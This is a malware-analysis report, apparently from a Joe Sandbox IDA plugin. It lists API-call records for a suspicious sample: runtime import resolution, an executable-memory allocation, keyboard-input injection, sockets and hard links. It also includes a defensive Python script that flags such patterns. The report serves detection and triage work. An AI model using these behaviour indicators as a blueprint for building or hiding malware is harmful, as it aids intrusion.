                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__lock__mtinitlocknum__updatetlocinfo
                                                                                                                      • String ID: 8W$8W
                                                                                                                      • API String ID: 547918592-3935117004
                                                                                                                      • Opcode ID: 7437a0e469d7bf0c25225a054d4c15b046daf13dda084abc6252693a6631ed17
                                                                                                                      • Instruction ID: bf681547375111861356990f9e7a458c8796a310f0a8fdd3fd85617b049bc342
                                                                                                                      • Opcode Fuzzy Hash: 7437a0e469d7bf0c25225a054d4c15b046daf13dda084abc6252693a6631ed17
                                                                                                                      • Instruction Fuzzy Hash: E8E046B1942340AAEA10BBA77D03B096E90AB44B2BF20419FF05D550C28E681D40A61F
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,004C4BD0,?,004C4DEF,?,005852F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 004C4C11
                                                                                                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 004C4C23
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                      • API String ID: 2574300362-3689287502
                                                                                                                      • Opcode ID: 65e946d01f6f7720d9f10f539cf06d4ffa72dc618ec503b7ba37b0f309527771
                                                                                                                      • Instruction ID: 317e45c83cb63b54c250b1cb8773e86b547fe0503cbbae13cc20ebca0c0ff96e
                                                                                                                      • Opcode Fuzzy Hash: 65e946d01f6f7720d9f10f539cf06d4ffa72dc618ec503b7ba37b0f309527771
                                                                                                                      • Instruction Fuzzy Hash: 9BD0C274500713CFC7205F74DA08A47BAD5EF0A345B01CC3E9485C2660E6B4C480C710
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,004C4B83,?), ref: 004C4C44
                                                                                                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 004C4C56
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                      • API String ID: 2574300362-1355242751
                                                                                                                      • Opcode ID: ae6b0416dc2c164a43cb3f337b24307b65c84ffbde69bca28b36a47090e525b7
                                                                                                                      • Instruction ID: fa8f031784bdd3bc299980048831cdcc9d30367b28e189ede1820c0e76fd9a2c
                                                                                                                      • Opcode Fuzzy Hash: ae6b0416dc2c164a43cb3f337b24307b65c84ffbde69bca28b36a47090e525b7
                                                                                                                      • Instruction Fuzzy Hash: 70D01274510713CFD7205F35DA18B4777D4AF16355B11C83E9495D6270E674D480D750
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,00541039), ref: 00540DF5
                                                                                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00540E07
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                      • API String ID: 2574300362-4033151799
                                                                                                                      • Opcode ID: 034d35ec1f9e4e35770a54be5c6fd29fa13944dc96d12261526b314b7e5f0bc9
                                                                                                                      • Instruction ID: 6ae5bba04e560c79af120bbc22d4596ec449814dd2aa9596201adad3cd15acc5
                                                                                                                      • Opcode Fuzzy Hash: 034d35ec1f9e4e35770a54be5c6fd29fa13944dc96d12261526b314b7e5f0bc9
                                                                                                                      • Instruction Fuzzy Hash: E7D01274510732CFD7205F75D8086C67AD9BF15355F11DC3D9585DA190D6B0D4A0D760
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00538CF4,?,0054F910), ref: 005390EE
                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00539100
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                      • API String ID: 2574300362-199464113
                                                                                                                      • Opcode ID: 92d6dbec81e5b2dde456257e89267b946547e0e37d1174c68a57aaee75a99928
                                                                                                                      • Instruction ID: 957e77dfb995de12964c3973fd41694d39e296e6b63bae140d4ab2f644171200
                                                                                                                      • Opcode Fuzzy Hash: 92d6dbec81e5b2dde456257e89267b946547e0e37d1174c68a57aaee75a99928
                                                                                                                      • Instruction Fuzzy Hash: 2FD01274550713CFD7209F35D81C5467BD4BF16355F11C839D485D6650E6B0C880D760
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LocalTime__swprintf
                                                                                                                      • String ID: %.3d$WIN_XPe
                                                                                                                      • API String ID: 2070861257-2409531811
                                                                                                                      • Opcode ID: d5c5a26a0e7bdc1cb20bf870c2698b733859632288d48ddd09e9efa815d1e0ab
                                                                                                                      • Instruction ID: 48911e6acdab86d0f78ea1db1340a8665f4055f0ccd36aa27adb92d4d5bffbd3
                                                                                                                      • Opcode Fuzzy Hash: d5c5a26a0e7bdc1cb20bf870c2698b733859632288d48ddd09e9efa815d1e0ab
                                                                                                                      • Instruction Fuzzy Hash: B4D01775848508EBCB109AA19D88CFD7B7CFB19316F540862F806A2080E2259B95EA2B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 0903d3569606d879a0e71ab6e68eec251859bcc6d298b0b2c0a2366bde07623d
                                                                                                                      • Instruction ID: f49a0cd6ba04b710bf14d43963b9696d93859adf355664c3ef70fed6b5533297
                                                                                                                      • Opcode Fuzzy Hash: 0903d3569606d879a0e71ab6e68eec251859bcc6d298b0b2c0a2366bde07623d
                                                                                                                      • Instruction Fuzzy Hash: E5C16E74A0421AEFDB14CFA8C884EAEBBB5FF4C714B148998E815DB251D770ED81DB90
                                                                                                                      APIs
                                                                                                                      • CharLowerBuffW.USER32(?,?), ref: 0053E0BE
                                                                                                                      • CharLowerBuffW.USER32(?,?), ref: 0053E101
                                                                                                                        • Part of subcall function 0053D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0053D7C5
                                                                                                                      • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0053E301
                                                                                                                      • _memmove.LIBCMT ref: 0053E314
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3659485706-0
                                                                                                                      • Opcode ID: 5b82925d2fc7b1683bb80c68101098bee0e7b3b1b19283ff4ec581c7afca6dc7
                                                                                                                      • Instruction ID: bd67f3102d1dbda8eb4dded0870e520ccfb3c11fb731a482fa529ad054e22354
                                                                                                                      • Opcode Fuzzy Hash: 5b82925d2fc7b1683bb80c68101098bee0e7b3b1b19283ff4ec581c7afca6dc7
                                                                                                                      • Instruction Fuzzy Hash: F2C167756083019FC744DF29C481A6ABBE4FF89718F14896EF8999B391D730E946CB82
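The records in this section are of two kinds worth separating when reading a report like this one. The LoadLibraryA/GetProcAddress pairs resolve RegDeleteKeyExW, GetModuleHandleExW and Wow64RevertWow64FsRedirection at run time; all three are absent on older Windows releases, so a runtime resolving them at startup is ordinary compatibility behaviour and, on its own, weak evidence. The VirtualAlloc(NULL, 0x77, 0x3000, 0x40) call followed by _memmove is different: 0x3000 is MEM_COMMIT|MEM_RESERVE and 0x40 is PAGE_EXECUTE_READWRITE, so a 119-byte executable buffer is being filled with copied bytes, which is the call site to inspect in the dump. The following Python is an added triage example, not code from Joe Sandbox or its IDA plugin: it parses API lines in the format used above and flags both patterns. The sample lines are constructed copies of the records in this section, and the script assumes the arguments are listed in Win32 prototype order and that calls within a record appear in address order (the ref values above are consistent with that).

```python
import re
from dataclasses import dataclass

# Constructed sample input: API lines copied from the IDA plugin records in this
# report section (bullets and "Part of subcall" indentation kept as rendered).
SAMPLE_RECORDS = """\
• LoadLibraryA.KERNEL32(advapi32.dll,?,00541039), ref: 00540DF5
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00540E07
• LoadLibraryA.KERNEL32(kernel32.dll,00000001,00538CF4,?,0054F910), ref: 005390EE
• GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00539100
• CharLowerBuffW.USER32(?,?), ref: 0053E0BE
  • Part of subcall function 0053D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0053D7C5
• VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0053E301
• _memmove.LIBCMT ref: 0053E314
"""

# One report line: <Api>.<MODULE>(<args>), ref: <call-site>. The argument list is
# absent for CRT calls such as _memmove.LIBCMT; "?" marks an argument the
# sandbox could not resolve statically.
API_LINE = re.compile(
    r"(?P<api>\w+)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",? ref: (?P<ref>[0-9A-Fa-f]{8})"
)

PAGE_EXECUTE_READWRITE = 0x40  # flProtect value of an RWX allocation


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: int        # call-site address in the dumped image
    subcall: bool   # True when listed as "Part of subcall function ..."


def parse_api_lines(text):
    """Parse report lines in the format above into ApiCall records."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.search(line)
        if m is None:
            continue
        raw = m.group("args") or ""
        calls.append(ApiCall(
            api=m.group("api"),
            module=m.group("module"),
            args=[a for a in raw.split(",") if a],
            ref=int(m.group("ref"), 16),
            subcall="Part of subcall" in line,
        ))
    return calls


def _hex_arg(args, idx):
    """args[idx] as an int when it is a hex literal; None for '?' or strings."""
    try:
        return int(args[idx], 16)
    except (IndexError, ValueError):
        return None


def find_rwx_allocations(calls):
    """VirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect) with
    flProtect == PAGE_EXECUTE_READWRITE. Returns (call_site, size_or_None)."""
    return [(c.ref, _hex_arg(c.args, 1))
            for c in calls
            if c.api == "VirtualAlloc"
            and _hex_arg(c.args, 3) == PAGE_EXECUTE_READWRITE]


def find_dynamic_imports(calls):
    """Pair each GetProcAddress(hModule, name) with the nearest preceding
    LoadLibraryA/W (assumes calls are listed in address order).
    Returns (library, function, call_site) tuples."""
    pairs, pending_lib = [], None
    for c in calls:
        if c.api in ("LoadLibraryA", "LoadLibraryW") and c.args:
            pending_lib = c.args[0]
        elif c.api == "GetProcAddress" and len(c.args) >= 2:
            pairs.append((pending_lib, c.args[1], c.ref))
            pending_lib = None
    return pairs


def triage(text):
    """Run both checks over a block of report lines."""
    calls = parse_api_lines(text)
    return {
        "calls": len(calls),
        "rwx_allocations": find_rwx_allocations(calls),
        "dynamic_imports": find_dynamic_imports(calls),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_RECORDS).items():
        print(f"{key}: {value}")
```

Run against the constructed sample, the dynamic-import check returns the two LoadLibraryA/GetProcAddress pairs and the RWX check returns the single VirtualAlloc site at 0x0053E301 with its 0x77-byte size; the memmove that fills that buffer is left to the analyst, since the report does not expose its destination argument.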
                                                                                                                      APIs
                                                                                                                      • CoInitialize.OLE32(00000000), ref: 005380C3
                                                                                                                      • CoUninitialize.OLE32 ref: 005380CE
                                                                                                                        • Part of subcall function 0051D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0051D5D4
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 005380D9
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 005383AA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 780911581-0
                                                                                                                      • Opcode ID: 2f230f8e3af04903d30760439fc4ded6cb3a989ea3c76d6643ac4d2cb47e0b7d
                                                                                                                      • Instruction ID: b6e1092f502747370bfd5eb1a216c46dead5000c4f4a44680a4fb5d38e644751
                                                                                                                      • Opcode Fuzzy Hash: 2f230f8e3af04903d30760439fc4ded6cb3a989ea3c76d6643ac4d2cb47e0b7d
                                                                                                                      • Instruction Fuzzy Hash: 86A14779604701AFCB44EF15C885B2ABBE4BF89718F14484DF9969B3A1CB34ED04CB96
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$AllocClearCopyInitString
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2808897238-0
                                                                                                                      • Opcode ID: bebcdaf46ca8c4de46506c44c9f75ff53d75d39028a53bfc525327f953c4bd20
                                                                                                                      • Instruction ID: d2f2a994de4df8dfdd5bf6bfe43cd918c4a4bc40b490853744f06c51961bcd64
                                                                                                                      • Opcode Fuzzy Hash: bebcdaf46ca8c4de46506c44c9f75ff53d75d39028a53bfc525327f953c4bd20
                                                                                                                      • Instruction Fuzzy Hash: 2C51B278700302EAEB24AF65D895ABABBE5BF45310F20D81FE596DB291DB74D8C08705
                                                                                                                      APIs
                                                                                                                      • GetWindowRect.USER32(0108EA30,?), ref: 00549863
                                                                                                                      • ScreenToClient.USER32(00000002,00000002), ref: 00549896
                                                                                                                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00549903
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$ClientMoveRectScreen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3880355969-0
                                                                                                                      • Opcode ID: d70ff47bb0d3578dc371b760ae217d8fbf7a5f9c77bb51fd728ea6749ffea65c
                                                                                                                      • Instruction ID: 0b759c14f7ca85276eed01cc4ba01ad60d7ed6d4bc06eb8a024d1f29a5b1b9e4
                                                                                                                      • Opcode Fuzzy Hash: d70ff47bb0d3578dc371b760ae217d8fbf7a5f9c77bb51fd728ea6749ffea65c
                                                                                                                      • Instruction Fuzzy Hash: 77513C34A00209EFCB14DF68C885AEE7BB5FF56364F14816DF855AB2A0D730AD41DB90
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00519AD2
                                                                                                                      • __itow.LIBCMT ref: 00519B03
                                                                                                                        • Part of subcall function 00519D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00519DBE
                                                                                                                      • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00519B6C
                                                                                                                      • __itow.LIBCMT ref: 00519BC3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$__itow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3379773720-0
                                                                                                                      APIs
                                                                                                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 005369D1
                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 005369E1
                                                                                                                        • Part of subcall function 004C9837: __itow.LIBCMT ref: 004C9862
                                                                                                                        • Part of subcall function 004C9837: __swprintf.LIBCMT ref: 004C98AC
                                                                                                                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00536A45
                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00536A51
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast$__itow__swprintfsocket
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2214342067-0
                                                                                                                      APIs
                                                                                                                      • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0054F910), ref: 005364A7
                                                                                                                      • _strlen.LIBCMT ref: 005364D9
                                                                                                                      Similarity
                                                                                                                      • API ID: _strlen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4218353326-0
                                                                                                                      APIs
                                                                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0052B89E
                                                                                                                      • GetLastError.KERNEL32(?,00000000), ref: 0052B8C4
                                                                                                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0052B8E9
                                                                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0052B915
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3321077145-0
                                                                                                                      APIs
                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 005488DE
                                                                                                                      Similarity
                                                                                                                      • API ID: InvalidateRect
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 634782764-0
                                                                                                                      APIs
                                                                                                                      • ClientToScreen.USER32(?,?), ref: 0054AB60
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0054ABD6
                                                                                                                      • PtInRect.USER32(?,?,0054C014), ref: 0054ABE6
                                                                                                                      • MessageBeep.USER32(00000000), ref: 0054AC57
                                                                                                                      Similarity
                                                                                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1352109105-0
                                                                                                                      APIs
                                                                                                                      • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00520B27
                                                                                                                      • SetKeyboardState.USER32(00000080,?,00000001), ref: 00520B43
                                                                                                                      • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00520BA9
                                                                                                                      • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00520BFB
                                                                                                                      Similarity
                                                                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 432972143-0
                                                                                                                      APIs
                                                                                                                      • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00520C66
                                                                                                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 00520C82
                                                                                                                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 00520CE1
                                                                                                                      • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00520D33
                                                                                                                      Similarity
                                                                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 432972143-0
                                                                                                                      APIs
                                                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004F61FB
                                                                                                                      • __isleadbyte_l.LIBCMT ref: 004F6229
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 004F6257
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 004F628D
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3058430110-0
                                                                                                                      • Opcode ID: c54a7cac2b3f5c9879f9d094d183035a4b05ea5c37dde3fb706be3365955808c
                                                                                                                      • Instruction ID: eb9464c781a3868ca76acfc3f434a21169d6fbd2568e271cefac29c5aae9905d
                                                                                                                      • Opcode Fuzzy Hash: c54a7cac2b3f5c9879f9d094d183035a4b05ea5c37dde3fb706be3365955808c
                                                                                                                      • Instruction Fuzzy Hash: 8631F03060024AAFDF219F65CC44BBB7BB9FF42310F1740AAE924872A1DB35E950DB94
                                                                                                                      APIs
                                                                                                                      • GetForegroundWindow.USER32 ref: 00544F02
                                                                                                                        • Part of subcall function 00523641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0052365B
                                                                                                                        • Part of subcall function 00523641: GetCurrentThreadId.KERNEL32 ref: 00523662
                                                                                                                        • Part of subcall function 00523641: AttachThreadInput.USER32(00000000,?,00525005), ref: 00523669
